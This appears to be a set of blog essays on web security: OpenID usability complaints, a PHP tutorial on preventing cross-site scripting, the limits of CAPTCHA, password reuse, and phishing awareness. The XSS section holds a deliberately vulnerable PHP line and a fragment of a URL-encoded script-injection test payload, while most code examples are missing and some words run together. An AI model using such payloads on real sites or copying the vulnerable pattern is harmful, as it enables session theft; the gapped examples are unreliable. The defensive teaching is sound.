My problems with OpenID

I’ve been tempted to write why OpenID has been driving me up the wall.

I have not implemented OpenID in any application, so I come at it not as an implementor or programmer but as an end user: a number of sites I’ve used, including Stack Overflow and Sourceforge, have either allowed or insisted upon OpenID authentication.

My first OpenID account was at Verisign Labs (PIP). They’re well established in web security, so I figured it would be a reliable service, and a company that wasn’t likely to disappear on me. Their service, however, left me frustrated for a few reasons.

  • For some reason (early onset dementia?), I could never remember my OpenID URL and found myself needing to look it up all the time, which meant starting up my email client. Because it’s not only a username I chose, but also includes the web address of the OpenID provider, I found it easier to forget. I can’t really see ordinary web users finding the URL thing intuitive; for some time now, favourites/bookmarks and search engines have been teaching us that remembering URLs shouldn’t be necessary.
  • The Versign Labs PIP has one of the most user-unfriendly features I have ever experienced. With the aim of preventing phishing attacks, a well-meaning goal, it does not allow you to authenticate yourself at any OpenID supported site at all unless you have already logged in directly at Verisign’s website during the same browser session. Try typing in your OpenID to your favourite site, and you get a message from Verisign telling you that no, you haven’t logged in to Verisign this session, so you can’t proceed. When I encouter this, I have no choice but to open up a second tab and head over to their site to log in, except that much of the time I can’t, because I don’t have a browser certificate installed on the computer I’m using at the time (I don’t think it’s abnormal to use more than one computer regularly). So in order to authenticate me, it has to send me an email containing a single-use PIN. Thank goodness my email account doesn’t use OpenID authentication and I can get to that fairly easily. I’ve never had to jump through so many hoops, just to log in to an application I already have an account at.
  • Once I’ve started using an OpenID identity from a certain provider on a site or two, it would appear that I am tied to that OpenID provider for life. It makes it very hard to evaluate OpenID providers when your choice is a permanent one. Yes, I realise that it is possible to use delegation, or even to install your own OpenID server, but if we’re going to be talking about end users, neither of these two are really practical, and both of them are likely to result in decreased security.

My second OpenID provider, MyOpenID, appears to be a fair bit easier to get along with, and doesn’t suffer from many of the problems I’d previously encountered.

Simply by opening another OpenID account, however, everything has become exponentially more complicated: if you switch providers, there’s no easy way that I can see to merge all site accounts based on an identity at my previous provider across to the new one. It seems like changing providers may mean ditching a bunch of old accounts and signing up for all new ones. I was impressed at the way Stack Overflow’s implementation allowed switching the OpenID identity associated with my account there. Unfortunately, this flexibility is a result only of Stack Overflow’s thoughtful design, and such a feature is not part of a typical OpenID implementation.

MyOpenID, thankfully, allows me to authenticate myself without having to twiddle around with going to the OpenID provider’s site in a separate browser window or getting a single-use PIN. I suppose it is similar to what the OpenID experience should have been like from the start. Maybe my Verisign Labs PIP account just had too many optional features turned on.

I still find, however, that some things about OpenID underwhelm me:

  • Signing up for a new account at an OpenID-enabled site appears no easier when using OpenID. After authenticating with my OpenID URL and whatever authentication I need to do at the OpenID provider’s end, when I return to the client site I still have to fill out a form, and most of the time I still have to confirm my email address. Some fields have been pre-filled by my OpenID account, but I still need to choose a username that is unique to that application, and likely even fill in a Captcha.
  • Users are well experienced already with simple username/password combinations. They know, for example, that the password should be kept secret, and it’s that secret that provides their security. Even though they might have several username/password combinations at different sites, this doesn’t make things any more complicated, because the same concept is just repeated. With an OpenID account, however, not only do they now have a username and password at their OpenID provider, but they also have this OpenID URL, and maybe even a browser certificate. That is three or four pieces of information. Furthermore, how will they understand that authenticating with an OpenID URL alone can provide any security, when the OpenID URL is not a secret, and there is no password? I wouldn’t be surprised if users thought that OpenID was grossly insecure, because they don’t understand that all the real security is hidden from them.
  • I also wouldn’t be surprised if the idea that their identity is passed between sites made users a bit worried. For instance, how can an OpenID implementor reassure the user that even if they use their OpenID URL to log in and register, that doesn’t mean the implementor now has the password to the user’s OpenID account? All the beneficial security concepts are a black box to the users, who may just assume that the OpenID account is a way for their password and identity to be freely passed around between sites. Far from using it only when high security is needed, we may find that users, unaware of the security benefits to OpenID, only trust OpenID with information they don’t mind losing.

So far I haven’t been convinced that using OpenID is significantly safer – even when comparing it to re-using the same username and password at a whole bunch of different sites, which is itself a dubious security practice. With OpenID, I still have all my eggs in one basket. If an attacker gains access to my OpenID account, he can still impersonate me at all sites where I rely on that identity.

OpenID is a well-meaning idea, and with more experience I am sure that I will master it more, but being this confusing and headache-inducing even to a web developer is a clear indication that it has some way to go before it can be considered fit for general use. Get this: the Wikipedia page for OpenID displays a prominent warning which reads “This page may be too technical for a general audience” applying to various sections, including the section titled “Logging in”. If it is too hard to describe how to “log in” without alienating a non-technical audience, it is a sign that the process is not too usable, and anyone thinking that they are implementing OpenID in order to “simplify” things for end-users may need to think twice.

While some boast about big companies like Google adopting OpenID, it’s not really all that much to crow about – their support is only as a provider, not as an implementor. I cannot, for example, use an existing OpenID to authenticate myself at Google, I can only use a Google ID to authenticate myself elsewhere. Not allowing OpenID authentication themselves doesn’t contibute to the widespread use of OpenID but further segregates it, which is probably just as much of an injustice to OpenID as its indecipherable Wikipedia page.

Cross-site scripting could make you lose your cookies

The following article was originally written in July 2005 and published on, and is republished with permission. For securing your web application you should probably also read about CSRF and clickjacking.

Cross-site scripting (XSS) is a form of security exploit that threatens any web application. In the past, its severity has tended to be underestimated. The problems go far beyond annoyances and practical jokes perpetuated by script kiddies. By stealing your cookies, Cross-site scripting attacks can allow attackers to gain administrative access to your web application.

How does it come about? The problem forms when a web application (such as a PHP script) displays user-submitted content without filtering and/or escaping it properly. If a user submits a guestbook entry, a blog comment, or even a username and password, that content could contain any character, including characters such as <, &, or which have a different, and special, meaning when they appear as part of HTML. If the same guestbook entry, blog comment or username field is saved by the web application and later displayed as part of a web page, without any intervening filtering or escaping, then any incidental < characters, which in a plain text field should have no special significance, will be interpreted by browsers as HTML tags. Any user who happened to slip the character sequence <script into such a field may be able to cause Javascript code to run in the browsers of other people who view the page.

This code may either be relatively harmless – for example, creating unwanted popups or spam – or malicious – code that is intended to gain private information in order to break into each user’s account on the system.

Although cross-site scripting often involves the insertion of a <script> tag into a web page, it is possible to do some damage with other code. There are many ways to run Javascript in a browser other than through the use of a <script> tag, as well as many other forms of active content besides Javascript. The XSS cheat sheet is the most thorough list of XSS attack vectors I know of, and show various methods of obfuscating or encoding XSS that may be used other than <script> tags.

Relatively harmless uses of Cross Site Scripting:

  • Code intended to disrupt the layout or appearance of a web page.
  • Scripts, applets or objects intended as a practical joke, displaying annoying messages or popups.
  • Code intended to launch unwanted popup windows for advertising or shock value.

Some more harmful uses of Cross Site Scripting:

  • Scripts, including Javascript or another form of active content, designed to collect private information from cookies and transmit it to a third party website in order to gain administrator access to the system.
  • Objects or applets intended to exploit a known security vulnerability in a particular browser.

Life cycle of a cross-site scripting exploit

I find that cross-site scripting can be a difficult concept to picture. I’ll lead you through a typical cross-site scripting scenario, to gives some examples of what is possible.

Joe has built himself a custom CMS complete with user accounts, sessions and different access levels for different users. To log into his CMS, he enters a username and password into a login form on the site. For the duration of his browser session, a cookie stores his ’session ID’ which allows him to remain logged-in while navigating around the site.

Joe’s website also allows any user to sign up for a new account, and place a ‘message’ onto the Website. For example, a message can be placed in a blog comment, or in the user’s profile, or even the user’s username. Unfortunately, Joe forgot to use htmlspecialchars or an equivalent to escape plain text in HTML in some places where he echoes user-submitted content to the browser.

A malicious user, Rick, signs up at Joe’s website and fills out his new profile page. In his user profile, he includes the text:


Now, whenever Joe (or anybody else) views Rick’s user profile, he gets an annoying JavaScript popup taunting him.

Rick gets a little craftier and places the following code into a guestbook entry of Joe’s page:


Now, whenever Joe (or anybody else) views the guestbook, he will be redirected to a page on Rick’s site. What’s more, the cookie from Joe’s browser session has been transmitted to Rick’s web server as part of the URL.

Rick now uses the cookie from Joe’s browser session to browse Joe’s CMS using Joe’s account. Rick may even be able to change Joe’s password, give himself administrator access, or start deleting content.

Rick gained administrator access to Joe’s CMS by placing a <script> tag into Joe’s guestbook. What we are dealing with here is session hijacking – stealing the session ID (which is often stored in a cookie) from another user in order to impersonate them on the system. XSS is a way for an attacker to obtain access to sessions on another server.

Rick could have used other methods to achieve the same result. For instance, Rick could have used a JavaScript link to trick Joe into sending the very same information to his server:

A web pageaboutdogs</a>

If Joe clicked that link, as he may do without even thinking, his session ID would be transmitted to Rick’s server.

Furthermore, Rick could have embedded his JavaScript into event handler attributes such as onclick, onmousemove and onsubmit – the latter which could be used to modify the behaviour of a form on the site.

Rick could also have tried using tools other than JavaScript – such as ActiveX controls or applets.

Patch those holes

Below are some steps which you can take to help prevent cross-site-scripting attacks from being used on your PHP application, and to limit the amount of damage that can be done in the event that someone finds a way anyhow.

Whenever displaying plain text content on your web site, escape the plain text string before doing so. In PHP, a simple way to do this is to use the htmlspecialchars function on the data right before. This includes all plain text data, whether it be user-submitted or not. The idea is that < and & characters need to be escaped whether their use is malicious or not.

You may be displaying unfiltered user-submitted content where you don’t realise it. For example, the following is dangerous.

  exit("Error:{$_GET['username']}istoolong. Yourusernamemaybeno morethan12characters");

In this case, the user variable “username” is being sent to the browser without being escaped. A user could construct a URL similar to the following and trick people into clicking it:'gotcha')%3B%3C%2Fscript%3E

The JavaScript above is harmless, but could be modified to steal information from cookies and transmit it to a third party. Notice that here, the <script> tag is URL encoded. This will automatically be decoded by the server.

You can also reduce the amount of damage that could be done if a user does hijack a user session. When designing your CMS, do not rely entirely on cookies for user authentication. Cookies are an excellent convenience feature for users, so their use is encourage, but there are some highly important tasks that may call for more protection. In addition to the cookie, users should also be asked for their password when they undertake activities such as changing their (or anybody else’s) password or escalating their privilege level. So, if your session is hijacked using your session ID, the attacker won’t be able to lock the rightful account owner out of the account or retain control over the account after they leave. Reducing the risk in the case of an attack, however, should be a secondary priority to preventing an attack in the first place.

What if you want your users to be allowed to submit HTML?

Escaping plain text for output is easy. All that needs to be done is to replace a small set of special characters with their escaped equivalents in HTML.

However, if a web application allows users to submit actual HTML (say, from a rich text editing control, or even prompting the user to type HTML in manually), then filtering this for safe output on a web page becomes much harder. Filtering HTML cannot be reliably done with a search and replace statement or two, or even a highly complex regular expression. Any filter would need to be able to interpret the HTML in the same way that a browser – any browser – might, and browsers do some strange things.

A common compromise, as seen on many blogs, is to allow only a small subset of HTML. This makes filtering considerably more attainable than otherwise, but by no means simple. A read through of the XSS cheat sheet will reveal the necessary complexity of any required filtering mechanism. What’s more, new methods of defeating XSS filters are discovered all the time (and may be added to the XSS cheat sheet at a later date).

I myself have written a rather comprehensive HTML and XHTML filter in PHP, and it consists of 3 files of source code with over 2000 lines of code in total, not including DTDs. It is capable of understanding the entire HTML language in terms of its DTD. To say it is complicated is an understatement, and it still has its limitations. If you wanted to go down that path you could use HTML Tidy, I presume, incorporated with your own filtering code to make the filtering part a bit easier.

Testing for cross-site scripting vulnerabilities in your application

A way to test for Cross Site Scripting vulnerabilities is to insert testing code into every field, and every variable passed on the query string, that you can find in your application.

The XSS cheat sheet that I mentioned above is the best source of XSS testing code that I know of.

Try, for example, inserting the following code where you would like to test.


Then, visit your blog to see what the comment looks like. If you see the code as you submitted it, your application handled it correctly. If your comment is blank, and you see a JavaScript popup, your application is vulnerable.

It’s important to not just test the obvious places where users can submit content. Think outside the square. For example, you display usernames all over the place – could a user possibly embed HTML or JavaScript into a username? What about user signatures? Secret questions and answers?

Cross Site Scripting can even be a problem in situations where HTML is filtered out of user-submitted content but another markup language is used.

Forum code or “BBcode”:


Wiki markup:


Is your forum or wiki vulnerable?

The above two exploits (for bulletin boards and Wikis) require an unsuspecting user to actually click the link in order for the script to be executed. Interestingly, when I first wrote this article, I was surprised to find that a wiki I used at work was vulnerable to this. If anybody is tricked into clicking a link, any JavaScript in that link will run.

More information about cross-site scripting is available in this CERT Advisory and this document from Apache. The Apache document points out, rightly, that the name “Cross-site scripting” is a misleading term, since the attacks need not involve scripting, and they need not even be across sites. Previously at SitePoint, Harry talked about Handling Content From Strangers, which gives some more information on how you can protect your application from exploits.

Have a look at this very thorough article by Chris Shiflett on preventing cross-site scripting attacks.

Cross-site scripting is only one possible form of remote attack on a web application. It is probably one of the most common vulnerabilities in web applications. However, other common vulnerabilities such as CSRF, including Login CSRF (PDF), and clickjacking, are just as serious.

Why CAPTCHA are not a security measure

CAPTCHA, those little groups of distorted letters or numbers we are being asked to recognise and type into forms, are becoming more and more common on the web, and at the same time, frustratingly, more and more difficult to read, like visual word puzzles. The general idea behind them is that by filling them in, you are proving that you are a human being, given that the task would be difficult for a computer program to carry out. CAPTCHA aim to reduce the problem of spam, such as comment spam on blogs or forums, by limiting the rate at which one can send messages or sign up for new accounts enough so that it becomes undesirable for spammers.


There is a problem, however, when these are talked about as a ‘security measure’. They are not a security measure, and this misconception is based on a flawed understanding of security: that humans can be trusted whereas computers – bots – cannot. CAPTCHA are not a bouncer; they cannot deny entry to any human that looks like they are going to start trouble. They can only let in all humans. If your security strategy is something along the lines of ‘If it’s a human, we can trust them’, then you are going to have problems.

Another problem with CAPTCHAs is that they are relatively easy to exploit, and by this I mean, pass a large number of tests easily in order to spam more efficiently. While a single human can only look at a certain number of images per hour, a number of humans, with a lot of time on their hands, can look at thousands of them per hour. If the internet has taught us anything, it’s that there are a lot of humans on the internet with a lot of time on their hands. So, while a CAPTCHA will slow one human down, it won’t slow hundreds of humans down.

The so-called ‘free porn exploit‘, a form of relay attack, takes advantage of this. CAPTCHA images are scraped from a site and shown on the attacker’s site. On the attacker’s site is a form instructing its visitors to identify the letters in the image, often by promising access to something such as free porn. All the attacking computer needs to do is drive a whole bunch of people to that form and then use all the resulting solutions to carry out the intended dirty work at the original site.

It doesn’t have to be porn, of course – that is just a popular way of illustrating this form of circumvention. Any time a human wants something, or even is a little bit bored, you can ask them to fill out a form. Get free jokes in your inbox, fill out this form. If you get many humans working against a CAPTCHA it makes the CAPTCHA ineffective.

Technology for solving CAPTCHA automatically, without requiring any human intervention at all, is also evolving at a high rate. Scripts that can solve known CAPTCHA variants are becoming available all the time, and in response, new CAPTCHA variants are emerging too, each one more difficult to read than the last. The computer power required to recognise characters visually is trivial compared to, for example, the computer power required to crack a good password from its hash, or to break an encryption scheme based on encrypted data. The CAPTCHA that are unbreakable today are only unbreakable by obscurity; they are constructed differently enough for previous ones that current computer programs don’t recognise the letters and numbers in them.

What are alternatives to CAPTCHA?

The alternative will vary depending on what you are using it for. If you are using CAPTCHA for reducing spam on your blog, then they will probably continue to do so, though you may find yourself resorting to other options. Bayesian or rule-based filtering, or a combination of both, are effective methods of reducing spam, and have the added benefit that they do not annoy the user or impede usability or accessibility like CAPTCHA would.

If you are using CAPTCHA as a security measure, you would need to ensure that you are only doing so based on a proper understanding of what kind of security they bring. Certainly, they cannot do anything about keeping unauthorised or unwanted people out, as this is not what they are designed for. They also have severe limitations in their ability to reduce spamming or flooding, due to them being relatively easy for a sufficiently organised attacker to bypass.

An earlier version of this article was published at in November, 2005.

The password problem

The first problem with passwords on the web is that passwords alone are not strong authentication. The second problem is that people have too many of them to remember.

Some people will reuse the same password on several different services, leaving all those services vulnerable if their password is compromised through any one of them. Other people use different passwords for several different services, but need to resort to writing passwords down or making heavy use of ‘forgotten password’ features because they are too hard to remember.

Online authentication

In the offline world, pretty good authentication can be achieved by combining a card with a PIN. This is an implementation of two-factor authentication. In short, this means that authentication is based not just on something a person has in their possession (like a key or card), something a person knows (like a PIN or password) or their own body (like a fingerprint or DNA), but on at least two of those three categories. The principle behind this is that it is significantly more difficult for an attacker to steal your identity if they need to both obtain something you have, and find out something you know. When your bank card is stolen, the thief cannot access your account unless they also know your PIN. If your PIN is guessed, overheard or intercepted somehow, the snoop cannot access your account without your card.

Online, however, strong authentication is a lot more difficult, because authentication has to rely almost entirely on something you know. This means that rather than just being one factor in authenticating you, your user name and password combination becomes the only factor. It becomes a lot easier for someone to steal your identity, as they only need to intercept your password somehow.

When we sign up for online accounts, we are told to create passwords that are “strong”, and unique. The general idea of “strong” here is hard to guess, but also helps with “hard for someone to see over your shoulder”. However, a strong password still does not protect against a situation where someone bugs your computer, or your ISP’s computer, and sees your password as it is transmitted. This is relatively easy to do – as easy as exploiting a bug on any software in your system or your ISP’s, or ISPs betraying your trust, etc.

In making passwords stronger, too, they are also made harder to remember. This is a good thing to a point. It means that someone who does overlook you typing your password is less likely to recall it or catch all the letters. But after a point, being harder to remember really detracts from security, because users are more likely to write them down in order to remember them. When the password is the only secret thing that can authenticate a person for an online account, having that password written down makes a less than ideal situation worse. It means that the password now becomes vulnerable not only to eavesdropping, but also to physical theft. Comparing this to two-factor authentication, we have gone in the opposite direction. Not only is there only a single factor, but there are two types of vulnerabilities for this single factor, and an attacker can choose either.

Multiple accounts

The number of accounts we need to authenticate ourselves (prove our identity) for is growing. It is not uncommon for someone to have a dozen different accounts or more for different online services, ranging in importance from online bank accounts and auction websites right down to simple blogs and discussion forums.

If we are to assume that people use different passwords for each, we are expecting too much for them all to be remembered. It is common practice for people to just write them all down, but as stated that detracts from security.

The alternative for users is to re-use the same password for multiple accounts, but this is putting all their eggs in one basket. If their one good password is compromised, then all these accounts are vulnerable. If your password is stolen or intercepted, it may not even be your fault – a company hosting one of your accounts may have let it slip through negligence.

A reasonable person probably uses a combination of the above – using unique passwords on only those very important accounts such as their online banking, while re-using a common good password for everything else.

Technological solutions

OpenID is a distributed authentication mechanism which aims to let someone log in to accounts with several different companies, without exposing their password to those companies. The password is sent only to the single OpenID provider, which authenticates the person and then signals to the company that the person has been authenticated according to that OpenID account.

This helps cut down the number of ways that a password could be intercepted. However, it does not change the fact that if that one single password does get compromised, the attacker can gain (albeit temporary) access to all those accounts. In fact, it could make it worse: upon gaining entry to your OpenID account, the attacker might be presented with a nice little list of all approved providers – IE a list of where they can use this OpenID account. This would depend on the OpenID provider.

Educating users

Educating users is something that does not work as well in practice as it does in intention. Most users already know that they should not write down their passwords, and they should be as strong and unique as possible. However, they will continue to behave in the way that is most convenient need to them, creating easier to remember passwords, re-using them, or writing them down, just to make it easier to deal with so many.

Telling people not to get phished

If you provide users with a password, you should probably think about telling them how to keep their password safe. Teaching users how to avoid being tricked into giving away their account data – being ‘phished’ – can be difficult.

Social engineering is a method of obtaining access to a secured system by exploiting a person’s trust. It consists of deceiving a person into granting access to a system by some sort of pretense. For example, let’s say I receive a rather desperate sounding phone call from an intern over in IT who has screwed up and lost their password and needs desperately to fix some problem for their boss. They know I have an account and are hoping I would be so kind to log in for them, something which I might be happy to do for a colleague. However, the person on the phone is not an intern in IT at all, and doesn’t even work for the company. What’s more, the second I have given them access via my own username and password, all of the security precautions are now absolutely useless; the attacker has gained access to the system they wanted to access. What if they pretended to be working at the bank? They might goad me into letting them empty my bank account.

A second example of a social engineering attack is to exploit a person’s guilt – to make the person believe that they have been caught doing something wrong and may get in a lot of trouble if they do not cooperate. This ‘cooperation’ may involve handing over their personal details. This kind of attack can even work if the victim did not do anything wrong; the act of being ‘accused’ can put someone into a defensive state. The desire to cover up any wrongdoing they have been accused of may distract them from the fact they are being conned.

The term phishing is used to describe such attacks when they are done over a message service, such as over email or text messages. Phishing is also often done on a large scale; a would-be attacker sends an email to perhaps thousands of people pretending to be from the IT department, or a bank, or something, hoping that at least one person will fall for the scheme. Some such schemes are wildly inventive, while there are just as many that are stock standard: ‘we need to confirm your account details’, or ‘we need to verify that your account is active’.

From the point of view of anybody involved in computer security, the fact that such attacks are so effective is depressing. They are effective for many reasons.

One reason such attacks are effective is that, like with any security precaution, it is as weak as its weakest point. In a large organisation in which lots of people have access to a system, only one person needs to slip up and accidentally give their username and password to the wrong person in order for the system to be compromised.

Another reason is that the users of a system may, being less confident with technology, be naturally inclined to trust and be a little fearful of somebody who both seems to know a lot more about technology and is in a position of authority; for example, someone from an IT department, or law enforcement, or who has access to their bank account. The consideration as to whether or not the person who contacted them is legitimate takes second place to the desire to comply with this person who seems so much more knowledgeable about the system.

It may also be that people don’t realise that computer security does not stop at some unseen attacker trying to guess or steal your password; that in large part an attacker can just walk right up to you and ask for it.

So, what do we tell the users?

Systems administrators often use the phrase ‘we will never ask for your password’. This is a good message, because it at least signals to users that there may be nefarious motivations behind someone offical asking you to confirm your password.

However, in most cases where someone is duped into giving their account information, they actually believe the person who has contacted them is legitimate. The phrase ‘we will never ask for your password’ can quickly develop exceptions to the rule; an attacker might say ‘Oh, but our systems are down and we have to log people in manually today.’ As it is coming from a person genuinely believed to be legitimate, such an exception is easily accepted to be true both because it is plausible, and because the victim trusts the attacker to know more about the issue than they do.

I think that users should be instructed that if they are ever asked for their password, even by genuine system administrators, they should not give it over the phone or in reply to the email. Instead, the receiver should call back the company on the known correct phone number and then give the password. Let’s say that I call you up and tell you that we are in the process of deleting unused accounts and we need your password to confirm whether your account is used or not. If you truly believe that my story is legitimate, you may ignore the advice that we never ask you for your password, because my story seems like a plausible reason for an exception to the rule. But if you have been told that you should always call me back when asked for a password, you may be less likely to be convinced by my insistence that that isn’t necessary. I might say that you won’t be able to call me back if you tried, or that the matter is urgent, but this may raise more red flags.

In terms of email phishing, too, we can instruct users never to click through a link to a site on which they have an account; instead, should they wish to visit the site they should type the site address or name into their browser.

Whether this is all effective is speculation, and it must still be remembered that no matter how security conscious an organisation is as a whole, it only takes one weak link: one uninformed or absent-minded person to slip-up and allow a breach of security.